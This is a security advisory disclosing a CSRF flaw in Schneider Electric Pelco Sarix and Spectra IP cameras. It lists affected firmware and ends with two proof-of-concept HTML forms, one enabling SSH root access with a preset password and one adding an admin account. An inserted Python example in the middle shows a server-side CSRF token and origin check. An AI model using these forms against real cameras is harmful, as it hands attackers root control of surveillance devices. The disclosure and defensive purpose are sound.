
Schneider Electric Pelco Sarix/Spectra Cameras CSRF Enable SSH Root Access


Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)
                  Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)
                  Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)
                  Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)
                  Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)

Summary: Pelco offers the broadest selection of IP cameras designed
for security surveillance in a wide variety of commercial and industrial
settings. From our industry-leading fixed and high-speed IP cameras to
panoramic, thermal imaging, explosionproof and more, we offer a camera
for any environment, any lighting condition and any application.
When nothing but the best will do. Sarix™ Enhanced Range cameras
provide the most robust feature-set for your mission-critical applications.
With SureVision™ 3.0, Sarix Enhanced delivers the best possible image
in difficult lighting conditions such as a combination of bright areas,
shaded areas, and intense light. Designed with superior reliability,
fault tolerance, and processing speed, these rugged fixed IP cameras
ensure you always get the video that you need.

Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.

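The missing check described above, worked through as an added example that is not part of the advisory or of the vendor's firmware: a server-side gate for state-changing endpoints such as /setup/network/ssh/update that verifies the request's Origin/Referer against the camera's own origin and requires a per-session anti-CSRF token in the form body. The site origin is taken from the PoC's form action; the secret, the session cookie name, the csrf_token field name and the attacker origin are assumptions constructed for the example. The first sample request is what a logged-in operator's browser would send when the PoC form is submitted (cookie attached, no token); the second is the same change made from the camera's own page.

```python
import hashlib
import hmac
from urllib.parse import parse_qs, urlsplit

# Assumptions for this example (not values from the advisory): the camera's own
# origin is taken from the PoC form action; the secret, cookie name and token
# field name are constructed here and would live in the real session layer.
SITE_ORIGIN = "http://192.168.1.1"
CSRF_SECRET = b"constructed-demo-secret-do-not-reuse"
SESSION_COOKIE = "session"
TOKEN_FIELD = "csrf_token"
STATE_CHANGING_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


def csrf_token_for(session_id: str) -> str:
    """Per-session anti-CSRF token the camera's own pages would embed in each form.

    Binding the token to the session id means a page on another origin cannot
    know it: the browser attaches the victim's cookie automatically, but the
    attacker's HTML never sees the token value.
    """
    return hmac.new(CSRF_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _origin_of(url: str) -> str:
    """Reduce a URL (Origin or Referer value) to scheme://host[:port]."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"


def check_state_change(method: str, headers: dict, cookies: dict, body: str):
    """Decide whether a request to an endpoint such as /setup/network/ssh/update
    or /setup/auth/users/create may proceed. Returns (accepted, reason)."""
    if method.upper() not in STATE_CHANGING_METHODS:
        return True, "safe method"

    hdrs = {k.lower(): v for k, v in headers.items()}

    # Defence in depth: browsers send Origin (or at least Referer) on form posts.
    # A submission launched from the PoC page carries the attacker's origin.
    source = hdrs.get("origin") or hdrs.get("referer")
    if source and _origin_of(source) != SITE_ORIGIN:
        return False, f"cross-site source {_origin_of(source)}"

    # Primary defence: the form must carry the token bound to this session.
    session_id = cookies.get(SESSION_COOKIE)
    if not session_id:
        return False, "no session"
    submitted = parse_qs(body).get(TOKEN_FIELD, [""])[0]
    expected = csrf_token_for(session_id)
    if not hmac.compare_digest(submitted.encode(), expected.encode()):
        return False, "missing or invalid csrf token"
    return True, "ok"


# Constructed sample 1: what a logged-in operator's browser sends when the PoC
# page's hidden form is submitted. The session cookie rides along; no token.
POC_SUBMISSION = {
    "method": "POST",
    "headers": {"Origin": "http://attacker.example",
                "Referer": "http://attacker.example/"},
    "cookies": {SESSION_COOKIE: "op3rator-session"},
    "body": "enabled=1&password=root123&password_confirmation=root123",
}

# Constructed sample 2: the same change made from the camera's own settings page.
LEGIT_SUBMISSION = {
    "method": "POST",
    "headers": {"Origin": SITE_ORIGIN},
    "cookies": {SESSION_COOKIE: "op3rator-session"},
    "body": ("enabled=1&password=root123&password_confirmation=root123"
             f"&{TOKEN_FIELD}={csrf_token_for('op3rator-session')}"),
}

if __name__ == "__main__":
    for label, req in (("PoC cross-site form", POC_SUBMISSION),
                       ("same-origin form with token", LEGIT_SUBMISSION)):
        accepted, reason = check_state_change(**req)
        print(f"{label}: {'accepted' if accepted else 'rejected'} ({reason})")
```

The token check is the primary defence and the origin comparison is defence in depth: a same-origin request without a token is still rejected, so the gate does not depend on the browser sending Origin or Referer. Setting the session cookie with SameSite=Lax or Strict would add a third, browser-enforced layer, but that attribute is not something the PHP/5.3.0 and Lighttpd/1.4.28 stack listed under "Tested on" can be assumed to emit.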
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown
           MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)
           Lighttpd/1.4.28
           PHP/5.3.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5416
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5416.php


07.04.2017

--


CSRF enable ssh root access:
----------------------------

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/setup/network/ssh/update" method="POST">
      <input type="hidden" name="enabled" value="1" />
      <input type="hidden" name="password" value="root123" />
      <input type="hidden" name="password_confirmation" value="root123" />
      <input type="submit" value="Go root" />
    </form>
  </body>
</html>



CSRF add admin:
---------------

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/setup/auth/users/create" method="POST">
      <input type="hidden" name="original_username" value="" />
      <input type="hidden" name="mode" value="create" />
      <input type="hidden" name="group" value="admins" />
      <input type="hidden" name="username" value="pelco_admin" />
      <input type="hidden" name="password" value="pelco_pass" />
      <input type="hidden" name="password_confirmation" value="pelco_pass" />
      <input type="submit" value="Add admin" />
    </form>
  </body>
</html>